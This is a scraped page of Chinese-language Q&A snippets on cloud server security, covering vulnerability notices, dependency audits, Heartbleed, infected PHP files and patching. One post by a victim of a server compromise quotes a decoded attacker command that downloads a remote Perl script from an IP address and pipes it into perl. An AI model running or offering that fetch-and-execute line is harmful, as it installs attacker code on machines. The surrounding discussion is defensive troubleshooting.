1回答
我知道在GitHub上推进我的前端代码是绝对安全的。但我关心的是我的后端代码。我想向未来的招聘人员展示我的服务器端编码技能。但是,如果我的后端代码中有一个严重漏洞,并且有人读取了我的代码并利用了该漏洞,该怎么办?基本上,我想说的是,我可以把我的正常项目的后端源代码推到GitHub上,但托管在云上的生产网站的后端代码值得吗?利用它可以让我花很多钱,同时也会失去应用程序的用户吗?
浏览 3提问于2021-01-27得票数 0
1回答
我们最近提供的几台云服务器似乎默认忽略了信号。我可以找出是什么导致了这种行为,它影响到依赖捕获信号的ctrl+c和bash脚本。
这可以使用set命令来演示,将在此环境中工作的服务器(几年前设置)与受影响的服务器进行对比。
me@working.server ~ $ sleep 300 &
[1] 9554
me@working.server ~ $ cat /proc/9554/status
Name: sleep
Umask: 0002
State: S (sleeping)
Tgid: 9554
...
SigQ: 0/63430
SigPnd: 0000000
浏览 0提问于2019-03-25得票数 1
当我通过putty分析云服务器上的PCAP恶意软件文件时,我的本地PC是否有可能被感染?我想在我的云服务器上运行来测试snort。我想知道这样做是否会影响我的本地机器。
浏览 0提问于2020-08-26得票数 0
1回答
【腾讯云】您好,腾讯云安全中心检测到您(账号ID:4093932,昵称:独自挥霍这斑驳了的青春)的主机存在远程桌面服务高危漏洞(CVE-2019-0708)尚未修复,目前已有漏洞利用工具传播,被利用可导致感染蠕虫或勒索病毒危害业务,风险极大。请您尽快在2019年9月26日10:00前完成漏洞修复,逾期未修复我们将采取禁止受影响端口(3389)的远程连接来保障安全,您可以通过控制台VNC登录机器修复并自助解封,详情请查看站内信
浏览 630提问于2019-09-25
2回答
在我们的项目中,我们有近200个春季启动微服务。我们正在修复这些微服务的开源漏洞。我们的微服务是基于spring引导的,目前可用的版本是2.3.X。
在对spring引导版本进行升级时,是否有需要选择spring引导版本的指导原则?目前,当我检查spring父程序的mvn存储库时,可用的最新版本是3.0。我可以直接更新到最新版本吗?或者在选择最新版本时是否需要考虑任何参数?
在我们的项目中,我们也有spring云依赖项,我检查了spring站点(),并能够获得与spring版本兼容的Spring云版本。我只能在春天的云上买到这个。是否有任何网站可以提供其他罐子的兼容性细节,如弹簧核心等
浏览 13提问于2022-11-30得票数 1
1回答
使用云应用程序和本地私有数据库
、、、、
我们正在开发一个使用java的云ERP产品,并希望为用户提供一个选择,以使用本地数据库文件或云上的数据库。对于我们的一些客户来说,他们的数据非常敏感,他们不希望他们的数据存储在web服务器上,而是希望将数据库存储在他们自己的服务器/pc上。
这种产品在技术上是可行的,安全的,有效的实现和维护吗?如果是这样的话,有没有人可以推荐这种架构的最佳解决方案,在这种架构中,我们云服务器上的应用程序可以与本地数据库无缝地工作?
非常感谢
LJ
浏览 1提问于2013-11-06得票数 1
1回答
我是exchange服务器和powershell的初学者,我正在开发Exchange服务器(在前提下),如何确定我是否有最新的更新、安全更新、windows服务器(核心)和exchange服务器的版本,所以我必须更新它?( powershell)。
提前感谢
浏览 0提问于2021-09-19得票数 -3
回答已采纳
我们有一系列运行JBoss的云服务器,作为6.1.0社区版。我们使用SSL限制对这些系统的访问。我们为每个服务器生成一个SSL证书,然后手动将其分发给需要访问的人员。服务器是它自己的证书颁发机构。证书不是用于向用户标识服务器,而是用于标识服务器的用户。
无论如何,重点是: JBoss作为6.1.0是否容易受到心脏出血的影响?我们使用openssl生成密钥,但据我所知,JBoss使用Tomcat/Coyote来完成https的操作。他们使用OpenSSL库吗?如果JBoss是一个问题,我如何具体地修补它的组件?不幸的是,升级JBoss版本不是一种选择。
浏览 0提问于2014-04-09得票数 1
回答已采纳
1回答
运行在服务器上显示病毒警告的网站
、、、、
我在Ubuntu8.04LTS上运行Plesk9.5,大约有15个网站被一些恶意代码附加到java文件的末尾。我已经安装了Clamav,它成功地收集了受感染的文件,这些文件的模式为/kmae9gr6m/或/gootkitstart/,以/qhk6sa6g1c/或/gootkitend/结束。
我的Plesk面板是最新的,并安装了安全修补程序。如何隔离服务器上的安全漏洞?
浏览 0提问于2012-06-25得票数 0
回答已采纳
1回答
预到云漏洞扫描
、、、、
我们有漏洞扫描软件在共享子网,我们的网上网络.我们现在正在添加托管在公共云上的VM,需要对它们执行漏洞扫描。一种选择是打开从open到公共云的单向流量,这样扫描仪就可以到达所有VM。因此,所有端口都将向VM开放(在一个方向)。这是可取的吗?在子网中运行vul扫描软件不更好吗?这样就不需要在on和cloud之间允许任何流量了吗?例如,运行在VM相同子网中的扫描仪可以将结果推送到dmz中的中央扫描器服务器。公司如何适应公共云解决这一问题?
浏览 3提问于2021-11-19得票数 0
回答已采纳
一个恶意的电子邮件附件会污染我的云电子邮件帐户中的所有附件吗?Gmail或Microsoft中提供了各种预览功能,可以有效地解释服务器上的图像或PDF之类的附件。一定有保护措施,对吧?
浏览 0提问于2022-01-11得票数 0
回答已采纳
1回答
我有一个SQL 2000数据库服务器,它不再受Microsoft的支持。我们已经应用了我们的信息安全策略,甚至PCI需求。在这种情况下,我们可能面临哪些安全风险?
我可以想到一个例子:漏洞。如果在服务器上发现新发现的漏洞,我们能修复吗?通常它们是通过新的补丁或更新来修复的,但在这种情况下,我认为微软不会提供任何补丁或更新。
浏览 0提问于2013-11-25得票数 1
我最近购买了一台云服务器用于备份。此服务器配置了公共IP地址,并在其上安装了Windows 2016。
另一方面,我在防火墙和局域网后面有一个Windows 2008。
我的目的是在远程服务器(云服务器)上创建一个映射驱动器,并按组策略(来自windows server 2008)部署它,以便用户能够将文件备份到自己的云目录中。
我已经在云服务器上安装并成功地配置了路由和远程访问角色,我在局域网上的一台机器上测试了从拨号连接到它的测试。这很好用。现在我需要的是映射这个文件夹使用局域网上的组策略从windows服务器2008,以便驱动器显示,而他们不需要连接到拨号连接之前登录。这有可能吗?
预先
浏览 0提问于2017-05-11得票数 0
2回答
对于我的项目,我使用了一个包,Seriate。
npm install seriate
但是,运行它会得到以下结果:
发现17个漏洞(9个低、1个中等、7个高)
我运行了npm audit和npm audit fix,但什么也没有。我还研究了依赖项,Lodash似乎有一个安全问题(据推测固定在4.17.11)。
我怎么才能修好这些?我已经尝试过像这样更新npm install lodash@4.17.11:然而,这也不起作用。
另外,这是否需要担心,它是从本地服务器上运行的,而本地服务器本身是安全的?
谢谢你的帮助
浏览 2提问于2019-07-03得票数 4
回答已采纳
在从hbase集群中删除几个节点时,我们过早地退出了hadoop (在退役之前)。当我们运行hdfs fsck时,我们意识到有几个缺块。我们立即将删除的节点添加回集群。fsck仍然报告说有一些块丢失了。
同时,HBase无法从这些区域找到这些丢失的块。最好的解决办法是什么?我们知道HBase无法找到的HDFS文件的位置。
更新:
更正- namenode只拥有丢失块的元数据。真正的街区不见了。现在我们如何修复HBase以从区域服务器中删除这些数据块?
浏览 2提问于2012-07-19得票数 0
回答已采纳
背景:
使用上面类似的内容,您可以看到Facebook为我所要完成的过程提供的文档。
也就是说,我有已经成功验证并链接到Facebook用户帐户的服务器API,并且在我们的服务器上有一个长期令牌。使用长期令牌(通过服务器端),我试图生成一个“客户端代码”(如Facebook所称),以便发送到我们的iOS客户端应用程序。然后,客户端应用程序可以用来创建一个长期令牌,以便在本地使用SDK。
采取的步骤:
文档说明需要传递三个值: access_token、client_secret、redirect_uri (client_secret是应用程序的秘密)。这已经是错误的,因为仅当传递这些值时
浏览 3提问于2013-08-26得票数 1
回答已采纳
我习惯于使用Meteor JavaScript框架开发web应用程序,该框架处理身份验证。我现在正在第一次开发一个web应用程序,它使用后端的Node.js (Express) + GraphQL堆栈,在前端使用React,所以我必须自己处理身份验证。
我读了很多关于它的内容,我喜欢基于令牌的身份验证的想法。我正在考虑使用JWT,所以我不必处理会话。
我知道有很多教程,但每个教程都有一种免责声明:“本教程还没有准备好生产,只用于教育目的.”。每次我读到有关身份验证的东西时,似乎都是很难实现的,所以我不应该自己实现它。但是我不想使用像AWS科尼托这样的服务提供商,谷歌云平台,因为我想把我的用户数
浏览 0提问于2018-07-10得票数 3
回答已采纳
如何确保我的PHP版本被更新以阻止Mayhem恶意软件?
更新我的Ubuntu服务器上的PHP会阻止Mayhem恶意软件将其放到服务器上,阻止它运行,或者其他什么吗?
我还能做些什么来防止它吗?
编辑:这是我发现的最具信息性的文章,描述了混乱:https://www.virusbtn.com/virusbulletin/archive/2014/07/vb201407-Mayhem
浏览 0提问于2014-07-21得票数 2
回答已采纳
2回答
不利用漏洞进行漏洞测试?
、、、
我在一台服务器上做了一些测试,看看它是否容易受到0天的本地攻击(该漏洞是为了使用Linux内核中的一个bug获得根权限)。除了运行该漏洞之外,还没有关于如何知道您是否易受攻击的真正信息。我这样做了,最后从数据中心那里得到了一大堆麻烦。在这种情况下,检查您的易受伤害性的最好方法是什么?人们是否可以假设,在他们被利用漏洞攻击之前,已经发布了一个修补程序(即使是在一个较硬的服务器上)?
浏览 0提问于2013-05-16得票数 5
回答已采纳
本来安装了wdcp,但是最近一朋友跟我说用宝塔更好,wdcp比较占用资源,然后宝塔不能安装云锁,好像不兼容然后想安装宝塔又不想舍弃云锁,因为有些云锁貌似不错,问下腾讯云主机有没有自带的这个防御[图片]第一就是漏洞的防注入[图片]还有这个CC防御不知道腾讯云主机有没有自带的这些等等
浏览 735提问于2017-04-04
“最低JavaScript SDK版本
解析服务器还至少使用了Parse的1.7.0版本,它与以前的版本有一些不同。如果您的Parse.com云代码使用的是以前版本的SDK,您可能需要更新云代码。通过在Cloud文件夹中运行以下命令,可以查找您的JavaScript云代码正在使用的Parse.com SDK的哪个版本:
$ parse当前的JavaScript SDK版本是1.7.0“
我现在的JavaScript SDK版本是1.6.14
最新的Parse javascript JDK位于
我如何实际使用下载更新到该版本的Parse?
浏览 3提问于2016-08-03得票数 1
2回答
如何从漏洞扫描或供应商发布的漏洞中手动验证漏洞?
假设你收到了一份高漏洞的报告。漏洞扫描器使用标头的版本检查。如果没有针对此漏洞的公开攻击,如果无法在内部访问服务器,如何检查它?一个例子是CVE-2019-13917,我似乎找不到一个公共漏洞扔到服务器上来验证漏洞,我的最后一个资源是将它发送给负责的it团队。这是正确的方法吗?-如果没有公开的利用,唯一的办法是通过反向工程从供应商那里获得补丁来创造你自己的漏洞.
Shodan漏洞扫描器给了我一份报告,它似乎在做版本检查,我需要验证这些漏洞是否真的是一个问题。
我知道版本检查很容易出现大量的假阳性,有什么办法可以避免吗?
浏览 0提问于2021-05-27得票数 1
1回答
我正在制作一个带有node express后端的网站,它从公共目录中提供react应用程序。我的电脑运行得很好,我把所有这些都放到了AWS服务器上,为我的服务器运行了npm install,为我的应用程序在公共目录中运行了npm install,这就是我得到消息的地方:
/public$ npm audit fix
up to date, audited 1960 packages in 5s
# npm audit report
public *
Severity: high
Cross-Site Scripting - https://npmjs.com/advisories/10
浏览 6提问于2021-01-08得票数 1
1回答
安全代码审查
、、、
对于由无法修补的遗留服务器版本承载的应用程序,定期以安全为中心的应用程序代码评审是否能够防止应用程序潜在的可利用漏洞?应用程序安全代码检查可以替换非可修补服务器吗?假设与应用程序中的敏感数据相关的代码。代码评审不能替换、修补或解决所有漏洞,但它可以减少一些由糟糕的编码实践造成的风险。如果遗留服务器不是可修补的,那么以安全为中心的代码评审是否至少可以解决一些源于糟糕的编码实践的漏洞呢?
浏览 0提问于2016-08-30得票数 1
1回答
文件连接和PCI遵从性?
、、、
好的,所以我已经设置了一个Docusign到第三方应用程序(Infusionsoft),并让它工作得很好。
它们本机不一起工作,所以我创建了一个php脚本,它读取docusign信封中的选项卡,并将其传递给Infusionsoft,以及完整信封本身的副本。
现在我想通过这个来传递支付信息,因为我在DocuS传中的文档模板之一是一份账单协议。我已经用虚拟信息做了一个测试运行,我能够很好地做到这一点,但是,我现在必须关注PCI在这方面的遵从性,对吗?
我有一个专用服务器,其域具有SSL证书,该证书承载php脚本,它不存储任何信息。它只是传递docusign (通过使用docusign收集),然后格
浏览 0提问于2015-04-07得票数 0
回答已采纳
我最近安装了一个威泽凸轮,一个品牌的Wi安全摄像头,我很好奇它是如何(在)安全。我听说怀兹公司的服务器曾经被攻破过一次。攻击者有多容易进入我的帐户?另外,如果攻击者连接到同一个Wi网络,他能直接拦截这些图像吗?还是在摄像头和威泽公司的服务器之间加密?
浏览 0提问于2022-04-22得票数 0
回答已采纳
我们有RHELv6.9服务器,并在其上安装了OpenSSH v5.3p1 (由输出openssh-5.3p1-123.el6_9.x86_64的rpm -q openssh确认)。经过安全测试后,我们被要求将OpenSSH升级到v7.3,以避免任何漏洞。
我试过yum update openssh,上面写着
No Packages marked for Update
知道吗,我怎么才能更新openssh?是否有可能在RHEL 6.9上将其更新到7.3?
浏览 0提问于2017-10-30得票数 6
回答已采纳
我知道CloudFlare可以保护您的应用程序免受SQL和XSS注入等攻击。但是操作系统和web服务器呢?
例如,如果我的网站托管在IIS/Windows上,CloudFlare是否也可以保护我的服务器免受操作系统漏洞和/或IIS漏洞的攻击?
浏览 2提问于2015-12-29得票数 0
我在谷歌云计算上运行一个网站,该网站使用debian。我们最近进行了一次安全审计,其中一项建议是将OpenSSH从7.4升级到7.8或更高版本。apt显示
openssh-server/oldstable,now 1:7.4p1-10+deb9u6 amd64 [installed,upgradable to: 1:7.4p1-10+deb9u7]
看起来,我们通过apt进行升级的最好方法是升级到稍新的7.4版本。是否有办法将其强制到7.8,还是需要一个新内核?我可以删除源代码,编译并安装它,但这会破坏系统上的其他东西吗?这是一个生产网站,所以我不想要任何惊喜。
浏览 0提问于2020-08-05得票数 1
我在c#中开发了一个小脚本来压缩服务器中的旧日志文件,不幸的是服务器没有.net 4.5,我尝试在服务器上安装.net 4.5,但它要求在安装前重新启动,不鼓励安装和重新启动服务器,因为它是一个活动的生产服务器,负载很重,因此需要批准,请帮助我如何在.net 4.0上实现由4.0提供的相同功能
浏览 20提问于2017-01-16得票数 0
回答已采纳
2回答
我运行了几个IIS + PHP + MySQL网络服务器,这些服务器运行各种Web应用程序(Wordpress、表达式引擎等)。
我知道我应该经常更新我的web应用程序,但是我想知道我应该多久更新一次PHP和Mysql?似乎大多数更新都是bug修复、稳定性增强、新特性,有时甚至是安全补丁。
测试和推出PHP/MySQL更新可能会非常密集,因此,如果可能的话,我宁愿将它们降到最低。
我是否应该计划每隔4/6更新一次最新的PHP & MySQL?如果有必要的安全补丁,几个星期或更早?
有什么想法吗?
浏览 0提问于2011-04-30得票数 0
1回答
你不能用Java编写安全的站点,因为源代码可以被检查,PHP能解决这个问题吗?我应该选择并查看什么,以了解如何编写可以处理支付的web服务器,例如使用比特币或an0ther协议?
浏览 0提问于2015-10-25得票数 0
我的主机多个wordpress站点都遇到了安全问题。所有的网站都有不同的主题,在不同的服务器上,在不同的用户内部隔离。他们已经竞选了几个月,没有任何问题。然而,上周,他们中的一些人受到以下因素的影响:
将流量重定向到显示文件系统中奇怪/损坏文件的垃圾邮件,包括添加到.php文件(编码头)中的额外文件和内容--我们的云提供商发出了滥用警报:一家大银行联系了他们,称我们的IP地址被用来进行钓鱼攻击。服务器在PHP进程(非常高的负载、CPU和内存使用)方面运行得很高。
对此,我有:
一个月前,FilesChecked 从备份中复制了SQL和Wordpress文件,用官方的Wordpress 替换了整
浏览 6提问于2020-04-20得票数 0
3回答
前天把站点搭建好了之后,云服务器就这么挂着,第二天打开远程连接的时候,为什么云服务器显示在登录界面?而且我用密码登陆不进去,提交工单之后说系统组件出了问题,我不知道是哪里有问题,然后让我提供之前的密码,但是我忘了,只好重装系统,好了昨天建好站点之后,没什么问题,今天打开远程连接,感觉服务器就像被人动过一样,软件设置被改了,然后界面也被改了,我想知道这个服务器本身就是这样,还是说我的服务器真的是被人动过?还有这服务器靠谱吗,才一天就出现系统问题,我很怕啊。
浏览 457提问于2018-06-14
我们自己托管的GitLab服务器正在随机崩溃,我们不知道原因。这种随机行为会影响我们的部署,它会变得太慢。重新启动后,熬夜几个小时并下降,抛出500或502错误。回到原处后,我看到与其他服务相比,总括grafana仪表板上的sidekiq或gitaly指标都下降了。这些服务是做什么的?如何调试这个问题?
系统信息:
OS - Centos 6.10 (最终)
CPU -8核
内存使用- 8.82 GB / 15.6 GB
磁盘使用-
根: 111 GB / 389 GB
引导: 169 MB / 476 MB
/mnt/resource :8.25GB/ 62.9
浏览 16提问于2022-03-14得票数 -2
回答已采纳
详细的错误日志如下
查找位置id查询错误:操作无法完成。Places服务器返回了我们无法理解的响应。如果您认为此错误代表错误,请使用我们的社区和支持页面()上的说明提交报告。错误:操作无法完成。Places服务器返回了我们无法理解的响应。如果您认为此错误代表错误,请使用我们的社区和支持页面()上的说明提交报告。
浏览 0提问于2017-08-24得票数 0
回答已采纳
这是Exchange2016 CU8在windows 2016标准上的新安装。
司机信件:
C: OS
D: Exchange 2016 CU8 ISO (挂载)
在Exchange2016 CU8安装之后,已被卸载,我为其设置了一个新的数据驱动器。数据驱动器采用驱动字母D:默认情况下。当我重新启动服务器时,会创建D:\AdvancedDataGovernanceLogs文件夹。
如果我将数据驱动器字母从D:更改为E:驱动器,则在服务器重新启动时不会创建D:\AdvancedDataGovernanceLogs文件夹。
什么是AdvancedDataGovernanceLogs文件夹,您如何更
浏览 0提问于2018-01-24得票数 1
我一直在评估这软件来保护云服务器的RDP连接。
问题是,它要求您使用RDP加密,而不使用TLS。这是因为使用TLS时,IP地址不会被记录。
当选择RDP加密时,登录屏幕显示您可以在连接时立即登录的帐户。选择TLS时,必须在连接之前向对话框输入帐户名称和密码。
这使我觉得将加密设置为RDP会泄露您的用户名,而TLS不会(或者我遗漏了什么)?
这种缺乏SSL和显示登录屏幕的功能值得记录IP地址并阻止它们吗?
浏览 0提问于2013-07-23得票数 2
回答已采纳
npm审计报告
glob-parent <5.1.2严重性:中等程度的正则表达式拒绝服务-beta无修复程序可用node_modules/webpack-dev-server/node_modules/glob-parent chokidar 1.0.0-rc1 - 2.1.8取决于glob-parent server服务器2.0.0- node_modules/webpack-dev-server/node_modules/chokidar 2.0.0- - 3.11.2取决于chokidar节点模块/ webpack-dev-server @node_modules/webpack
浏览 2提问于2021-09-02得票数 0
2回答
开放港口的脆弱性
、、
我正在云机器上安装服务,我想知道客户的端口漏洞。
我的服务位于服务器A(通常在客户站点上),需要通过端口1234访问服务器B(生活在云中)。在服务器B上,有一个服务运行在端口1234上,但是客户通常希望阻止对它的访问,将其作为非标准端口。服务器A没有运行在该端口上的服务,但仍然需要能够在该端口上进行通信。
是否存在打开端口的漏洞,该端口用于与另一个服务建立连接?如果你扫描一台机器A,端口就会打开,但上面什么也没有。
典型的解决方案是在IP A和IP B之间启用端口1234,但是在云中,我们不能保证IP地址。
浏览 0提问于2013-05-12得票数 0
我有一个非常奇怪的问题。我在windows azure云上使用Elasticsearch和Couchbase。我在一台ubuntu机器(3.5 gb)上配置了couchbase和elasticsearch。我已经把elasticsearch放在自动索引上了。我有一个java应用程序,可以与couchbase和elasticsearch对话。
这里的问题是,我看到从服务器上传出的大量数据在一天内达到500 GB,这让我付出了高昂的代价,比如每天80美元。我也试过将这个东西重新部署到其他盒子上,但结果是一样的。
我还尝试将elasticsearch和couchbase放在不同的服务器上,但输出的数
浏览 0提问于2014-11-24得票数 0
我是Ubuntu服务器的新手。我发现这篇文章是关于Debian的APT中的一个漏洞。你认为这个问题已经解决了吗?
1月22日,Debian的apt中存在一个漏洞,可以方便地在数据中心横向移动发布了一篇文章,详细描述了apt客户端的一个漏洞。在中间技术中使用Man,攻击者可以在apt通信下载软件包时拦截它,用自己的二进制文件替换请求的包内容,并使用根权限执行它。
apt/apt- Max Justicz中的远程代码执行我在apt中发现了一个漏洞,允许网络中间人(或恶意包镜像)在安装任何包的机器上以根用户身份执行任意代码。这个错误在apt的最新版本中已经修复了。如果您担心在更新过程中被利用,您可以
浏览 0提问于2019-05-12得票数 8
Scout是一种探索性测试工具,它与Tableau的服务器或桌面产品交互,以便在一组工作簿中捕获特定用户操作的性能指标。
Scout在2021年12月3日更新为v1.5,就在log4j漏洞出现之前。由于漏洞,我们无法使用Scout,我们正在寻找让Scout再次运行的选项。
童子军入门页面:
浏览 15提问于2022-07-18得票数 0
我开始创建一个小型的云平台来学习,并在以后扩展到真正的使用。我使用的是C#和WCF。我的想法是有一个服务器和执行器系统。服务器将包含用户提交给它的作业。执行器系统向服务器请求作业,并执行作业并将结果更新到服务器。该作业是一个具有方法execute()的C#类对象,该方法将由执行器调用。
我的问题是,如何将对象及其方法(行为)移交给Executor,以便Executor执行它。序列化对象时,只会发送数据。我想知道像这样的云框架是如何实现的。我对任何在远程系统上执行作业的C#技术都持开放态度,尽管我更喜欢WCF。
浏览 2提问于2012-07-27得票数 0
我已经下载了我的网站/数据库,并在Centos 7服务器本地重新创建它。我想给它一个很好的锤击,以便找到和修复任何漏洞。有人能推荐一款能帮我完成这个功能的软件吗?开源就太棒了!
浏览 0提问于2016-09-27得票数 -5
在哪里或者怎样才能找到一个没有补丁的操作系统的安全漏洞列表呢?我想确定我可以告诉服务器所有者在过时的操作系统上的实际风险。我可以得到所有CVEs的列表,但是我无法筛选补丁状态。
浏览 0提问于2016-06-30得票数 3
回答已采纳
1回答
在过去的几周里,我一直注意到我们服务器上的CPU负载非常高,在检查htop时,有许多同步_超人进程以100%的速度运行。今天,我很快就捕捉到了原来的命令调用仍然在htop中,下面的图像显示了运行脚本的调用以及由此产生的同步_超人进程。
📷
阅读我可以看到的行,它使用base64编码的字符串隐藏了它正在调用的内容,如下所示:
wget -qO - http://185.234.218.248/bt2.txt|perl
它正在下载的文件是一个perl脚本,它连接到一个irc服务器上,但是我快速地看了一下(我不知道perl),我不知道它除了敲我的CPU之外还做什么,尽管我假设它是比特币农作之类的。我
浏览 0提问于2019-03-06得票数 3
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
即时通信 IM
腾讯会议活动推荐
腾讯云开发者
